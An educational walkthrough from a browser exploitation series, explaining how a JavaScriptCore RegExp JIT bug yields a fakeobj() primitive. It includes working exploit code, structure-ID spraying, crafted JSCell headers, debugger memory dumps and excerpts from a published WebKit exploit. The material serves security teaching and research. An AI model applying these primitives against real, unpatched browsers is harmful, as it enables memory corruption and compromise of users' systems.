The fakeobj() Primitive: Turning an Address Leak into a Memory Corruption
TLDR
In this video we introduce the fakeobj() primitive. It's based on the bug used in addrof() and allows us to corrupt the memory of internal JavaScriptCore objects
Series
- 0x00: New Series: Getting Into Browser Exploitation
- 0x01: Setup and Debug JavaScriptCore / WebKit
- 0x02: The Butterfly of JSObject
- 0x03: Just-in-time Compiler in JavaScriptCore
- 0x04: WebKit RegExp Exploit addrof() walk-through
- 0x05: The fakeobj() Primitive: Turning an Address Leak into a Memory Corruption
- 0x06: Revisiting JavaScriptCore Internals: boxed vs. unboxed
- 0x07: Preparing for Stage 2 of a WebKit Exploit
- 0x08: Arbitrary Read and Write in WebKit Exploit
Introduction
From the last blog post we've seen how we can leak the address of a JavaScript object; now it's time for us to see if we could achieve a memory corruption. Before jumping into the code, it's crucial that you have a basic understanding of how a JavaScript object looks like in memory (with inline properties and the butterfly) because, in this post we will use this knowledge to turn a memory leak into a memory corruption.
You might wonder how can we turn this memory leak into something that allows us to compromise the JavaScript engine. Well, it's a not as easy as a simple buffer overflow where you get to control the instruction pointer directly. The bug we have here gives us some capabilities, but we need to do more to turn it into something powerful.
'fakeobj' Primitive
In saelo's article, he talks about two primitives - addrof
and fakeobj
. We've already used addrof
to leak the address of an object in memory, so now let's look at the fakeobj
one.
The fakeobj primitive works essentially the other way around. Here we inject native doubles into an array of JSValues, allowing us to create JSObject pointers.
Remember from this post, the JSValues are stored 32-bit integers with this format where the highest bytes were FFFF
like shown below.
Pointer { 0000:PPPP:PPPP:PPPP
/ 0001:****:****:****
Double { ...
\ FFFE:****:****:****
Integer { FFFF:0000:IIII:IIII
This is precisely how we found them in memory, however when you add a JavaScript object into an array, then you store a pointer, which is the address to that object. So if addrof
primitive uses this idea to read the pointer to an object as a double, can we also reverse this so that a double is interpreted as the pointer to an object? Well, that's precisely what we are going to do now.
Let's copy the addrof
code and start modifying it.
//
// fakeobj primitive
// Numbers in the comments represent the points listed below the code.
function fakeobj(dbl) { // (1) & (2)
var array = [13.37];
var reg = /abc/y;
// Target function
var AddrSetter = function(array) { // (4)
"abc".match(reg);
array[0] = dbl; // (3)
}
// Force optimization
for (var i = 0; i < 100000; ++i)
AddrSetter(array);
// Setup haxx
regexLastIndex = {};
regexLastIndex.toString = function() {
array[0] = {};
return "0";
};
reg.lastIndex = regexLastIndex;
// Do it!
AddrSetter(array);
return array[0]; // (5)
}
Here is what changed:
- Changed the function name from
addrof
tofakeobj
to match it's primitive. - Changed the name of the argument from
val
todbl
, which represents double. - Instead of reading and returning the first value of the array as the double, we write to it.
- Changed the name of the function from
AddrGetter
toAddrSetter
. - Instead of returning the results of the old
AddrGetter
, we are just returning the first element of the array.
It all starts with an array with doubles and we JIT the code that's responsible for writing a double of our choice into the first element of that array - nothing special, totally normal. Then we prepare the bug with the toString
function and call the AddrSetter
function again. This will execute the RegEx, which calls the toString
and assigns an object to the first element of the array. Now the JavaScript engine will turn the array with doubles into an array with contiguous and places a pointer to this new object into it. BUT the JIT-ed code still thinks that we have an array with doubles and this will write a double of our choice into the first element, overwriting the old pointer. Now if this double that overwrites the object address looks like a pointer, then JavaScript will think that the first element of the array is pointing to an object. Let's try this.
The Fake Object
Let's try to craft an object, but first, let's run jsc with lldb attached to it and also let's run our JavaScript file in an interactive mode.
$ lldb ./jsc
(lldb) run -i ~/projects/webkit/test.js
Process 64142 launched: './jsc (x86_64)
>>>
Let's keep this simple and create an object with a single property x
which is a simple integer.
>>> test = {}
[object Object]
>>> test.x = 1
1
>>> describe(test)
Object: 0x62d0000d4080 with butterfly 0x0 (Structure 0x62d000188310: [...])
# Hit CTRL + C
(lldb) x/4gx 0x62d0000d4080
0x62d0000d4080: 0x0100160000000126 0x0000000000000000
0x62d0000d4090: 0xffff000000000001 0x0000000000000000
Looking at the object, we see that the 0x0100160000000126
has some flags and the Structure ID, together they are a JSCell Header. Then we have a butterfly which is null (0x0), followed by the inline property x
which we set to a 32-bit integer with the value of 1
. Now keeping this in mind, let's try to fake such an object.
One of the most clever parts of this exploit is that while faking the objects, we can abuse the fact that the first few properties of the object is inlined and not placed into the butterfly. But let's see first how this object looks like in memory. Notice how the properties 1, 2, 3 show up?
>>> fake = {}
[object Object]
>>> fake.a = 1
1
>>> fake.b = 2
2
>>> fake.c = 3
3
>>> describe(fake)
Object: 0x62d0000d40c0 with butterfly 0x0 ...
# Hit CTRL + C
(lldb) x/6gx 0x62d0000d40c0
0x62d0000d40c0: 0x0100160000000129 0x0000000000000000
0x62d0000d40d0: 0xffff000000000001 0xffff000000000002
0x62d0000d40e0: 0xffff000000000003 0x0000000000000000
Now let's just test our primitive. We can use addrof to get the address, and then we use fakeobj on this address. This means hax should now be the same object as fake.
>>> addrof(fake)
5.36780059573753e-310
>>> hax = fakeobj(5.36780059573753e-310)
[object Object]
>>> hax.a
1
>>> hax.b
2
>>> hax.c
3
>>> describe(hax)
Object: 0x62d0000d40c0 with butterfly 0x0 ...
>>> describe(fake)
Object: 0x62d0000d40c0 with butterfly 0x0 ...
Cool. We can get the address of the fake object and we can get back the fake object using our fakeobj
primitive. But here comes the trick. We fully control the double that is interpreted as a pointer by the JavaScript engine. So what if we add a tiny bit (+0x10) to that double value which is the address of the fake object, so that the pointer is now shifted forward and pointing a bit down into the memory.
If we use the fakeobj
function now, JavaScript will think that the new offset is the JavaScript Object, but in our case, it doesn't look like a valid JavaScript object because it's missing the flags, the butterfly and the inline properties. Since we control the inlined properties, we can try to craft a valid Javascript object.
Let's start with the flags and the Structure ID. As you know, the Structure ID defines what kind of properties exists on an object. If we want to fake the test object with the property x
from the earlier, we need to use exactly the Structure ID from the test object.
Our test
object looks like this
# Flags and Structure ID | Butterfly
0x0100160000000126 0x0000000000000000
0xffff000000000001 0x0000000000000000
# Inline property `x` with the value `1`
So we want to write a fake structure ID that matches the real Structure ID into the first property. But since we don't have a handy function like describe
in browsers, how are we suppose to read the Structure ID of the test
object at run time? Well, we already know that we can create a new structure and get a new Structure ID every time we add a new property onto the object. So we can abuse this to spam and then guess a valid Structure ID.
We create a lot of these test objects with the property x
but also an arbitrary other property to force new Structure IDs. Basically, we spray test objects.
for (var i=0; i<0x1000; i++) {
test = {}
test.x = 1
test['prop_' + i] = 2
}
2
>>> describe(test)
Object: 0x62d00089d300 with butterfly 0x0 (Structure ...:[Object, {x:0, prop_4095:1} ...])
If we look at the last test
object that was created, we see that there is our x
property, but also there's this other arbitrary property, but most importantly it has a huge structure ID. So if we randomly pick a Structure ID of let's say 0x1000, we should be very certain that we get one of those test objects. Theoretically, this could also fail, and it could so happen that the Structure ID was not our target test object, but we can really increase our probability by spraying more objects.
So now we want to craft a 64-bit value 0x0100160000000126
which is our special flags and the Structure ID. Since we are going to be writing the double let's convert this 64-bit integer to a double.
>>> # This is python, not the jsc interpreter
>>> import struct
>>> struct.pack("Q", 0x0100160000001000)
b'\x00\x10\x00\x00\x00\x16\x00\x01'
>>> struct.unpack("d", struct.pack("Q", 0x0100160000001000))
(7.330283319472755e-304,)
Now this double should be a valid JSCell header for our fake object and we can assign it to the property a
.
>>> // this is javascript
>>> fake.a = 7.330283319472755e-304
7.330283319472755e-304
>>> describe(fake)
Object: 0x62d0000d40c0
// Hit CTRL + C
(lldb) x/6gx 0x62d0000d40c0
0x62d0000d40c0: 0x0100160000000129 0x0000000000000000
0x62d0000d40d0: 0x0101160000001000 0xffff000000000002
0x62d0000d40e0: 0xffff000000000003 0x0000000000000000
However, as you can see our value is messed up a bit. Carefully compare 0x0100160000001000
with 0x0100160000001000
. There's an additional 1
in 0x0101160000001000
that shouldn't be there. This is due to the NaN-encoding for JSValues.
The scheme we have implemented encodes double precision values by performing a 64-bit integer addition of the value 2^48 to the number.
So basically the engine will add 0x1000000000000
, so we just gotta subtract this value.
>>> # This is python
>>> struct.unpack("d", struct.pack("Q", 0x0100160000001000-0x1000000000000))
(7.082855106403439e-304,)
Now let's try again.
>>> // this is javascript
>>> fake.a = 7.082855106403439e-304
7.082855106403439e-304
>>> describe(fake)
Object: 0x62d0000d40c0
// Hit CTRL + C
(lldb) x/6gx 0x62d0000d40c0
0x62d0000d40c0: 0x0100160000000129 0x0000000000000000
0x62d0000d40d0: 0x0100160000001000 0xffff000000000002
0x62d0000d40e0: 0xffff000000000003 0x0000000000000000
Now we have the right value 0x0100160000001000
. Next, we have the butterfly, and we want this to be 0
, but how can we do that if the JavaScript adding ffff
at the beginning? It's very simple; we can set it to some value and just delete the property which will throw away everything and place 0x0
.
>>> fake.b = 2
2
>>> delete fake.b
true
// Hit CTRL + C
(lldb) x/6gx 0x62d0000d40c0
0x62d0000d40c0: 0x0100160000000129 0x0000000000000000
0x62d0000d40d0: 0x0100160000001000 0x0000000000000000
0x62d0000d40e0: 0xffff000000000003 0x0000000000000000
The third property on our fake object would become the first property on our fake test object, so we can set it to anything we want, how about 1337?
>>> fake.c = 1337
1337
// Hit CTRL + C
(lldb) x/6gx 0x62d0000d40c0
0x62d0000d40c0: 0x0100160000000129 0x0000000000000000
0x62d0000d40d0: 0x0100160000001000 0x0000000000000000
0x62d0000d40e0: 0xffff000000000539 0x0000000000000000
Now everything looks promising, so let's place all of this into our test.js
script.
function fakeobj(dbl) {
...
}
for (var i=0; i<0x2000; i++) {
test = {}
test.x = 1
test['prop_' + i] = 2
}
fake = {}
fake.a = 7.082855106403439e-304
fake.b = 2
fake.c = 1337
delete fake.b
print(addrof(fake)); // get the address of the fake object
Running this will spit out the usual address of the fake
object.
(lldb) run
5.367800960505e-310
>>> x/6gx 0x62d0007de880
0x62d0007de880: 0x010016000000212a 0x0000000000000000
0x62d0007de890: 0x0100160000001000 0x0000000000000000
0x62d0007de8a0: 0xffff000000000539 0x0000000000000000
5.367800960505e-310
is 0x62d0007de880
, but we want to shift 16 bytes(0x10) down, so let's use python to do that.
>>> # This is python
>>> struct.unpack("d", struct.pack("Q", 0x62d0007de880 + 0x10))
(5.3678009605058e-310,)
Now let's try to use the fakeobj
function to see if this created a object.
>>> // this is javascript
>>> hax = fakeobj(5.3678009605058e-310)
[object Object]
>>> hax.x
1337 // It works!
>>> describe(hax)
Object: 0x62d0007de890 with butterfly ...
There we go, we have an object at 0x62d0007de890
, which means we made jsc think that hax
is an object, but those are actually just properties of our fake object. This means that if we change the property on one would affect the other.
>>> hax.x
1337
>>> fake.c = "LiveOverflow"
LiveOverflow
>>> hax.x
LiveOverflow
This might seem a bit useless to you, but imagine the power we have now. We can craft arbitrary JavaScript Objects, and you control their internal class properties down to the memory level. This is not yet a code execution, but the question we should ask ourselves:
What JavaScript object could we fake that increases our capabilities?
At this point we could go about doing some security research and try to find good objects, but since we are noobs and there are other awesome researchers out there who've asked this question and figured ways out, let's just go with them. So let's see what Linus does in his exploit.
Linus's way
- In
pwn.js
, he sprays a bunch ofFloat64Array
structures in the same way we did.
var structs = [];
for (var i = 0; i < 0x5000; i++) {
var a = new Float64Array(1);
a['prop' + i] = 1337;
structs.push(a);
}
- Then he also sprays a few
WebAssembly.Memory
objects and prepares some web assembly code.
for (var i = 0; i < 50; i++) {
var a = new WebAssembly.Memory({inital: 0});
a['prop' + i] = 1337;
structs.push(a);
}
var webAssemblyCode = '\x00asm\x01\x00\x00\x00\x01\x0b\x02...';
var webAssemblyBuffer = str2ab(webAssemblyCode);
var webAssemblyModule = new WebAssembly.Module(webAssemblyBuffer);
- He also sets up the JSCell Header using the
Int64
fromInt64.js
library which is created by saleo which we are going to ignore for now. Basically, it'll just create a fake JSCell Value as we did with python.
var jsCellHeader = new Int64([
0x00, 0x50, 0x00, 0x00, // m_structureID
0x0, // m_indexingType
0x2c, // m_type
0x08, // m_flags
0x1 // m_cellState
]);
- Down below, he creates a new object called
wasmBuffer
and the first property is thejsCellHeader
like the first propertya
of our fake object. He also creates a butterfly. However, later down the road, he deletes it.
var wasmBuffer = {
jsCellHeader: jsCellHeader.asJSValue(),
butterfly: null,
vector: null,
memory: null,
deleteMe: null
};
- Deletion of the butterfly, because he apparently wants it to be
0
.
delete wasmBuffer.butterfly
- Going down, we see our first
addrof
, which leaks the address of thewasmBuffer
object as a double.
var wasmBufferRawAddr = addrof(wasmBuffer);
- Now he shifts the entire the pointer 16 bytes down by adding
0x10
to the original just like we did.
var wasmBufferAddr = Add(Int64.fromDouble(wasmBufferRawAddr), 16);
- After that he uses the library code again to turn the address back to double and then passes it the the
fakeobj
function.
var fakeWasmBuffer = fakeobj(wasmBufferAddr.asDouble());
- Now he should get a fake
Float64Array
. But here's a trick. Remember that he sprayed theFloat64Array
first and then a bunch ofWebAssembly.Memory
objects in the first and the second step? Turns out he is not interested in theFloat64Array
at all. - The while loop checks if the
fakeWasmBuffer
is not an instance of theWebAssembly.Memory
object. But how does this make any sense when he deliberately chose a structure ID to get aFloat64Array
. Well, he abuses the fact that the two objects are overlapped. The fake wasmBuffer overlaps with the original wasmBuffer JSCell header. When we changed the value of the fake object's propertyfake.c = "LiveOverflow"
, we saw that it had a direct change on thehax
object as well. Here he keeps incrementing the JSCell header of thewasmBuffer
which affects the real Structure ID of the fakewasmBuffer
.
while (!(fakeWasmBuffer instanceof WebAssembly.Memory)) {
jsCellHeader.assignAdd(jsCellHeader, Int64.One);
wasmBuffer.jsCellHeader = jsCellHeader.asJSValue();
}
- So in each loop, he checks if the fake
wasmBuffer
has turned into aWebAssembley.Memory
object. Basically, he's bruteforcing the Structure IDs in a safe way until he gets theWebAssembley.Memory
object. This is the reason why he sprayed many floats first since they are fast and then sprayed a fewWebAssembley.Memory
. Spraying the floats is much faster to get many Structure IDs so he can be sure to get such a fake object and thenWebAssembley.Memory
memory structures follow after that.
Of course, this is still not an arbitrary code execution, nor does it even try to explain how we get it, but we will slowly get there. We understood yet another crucial part.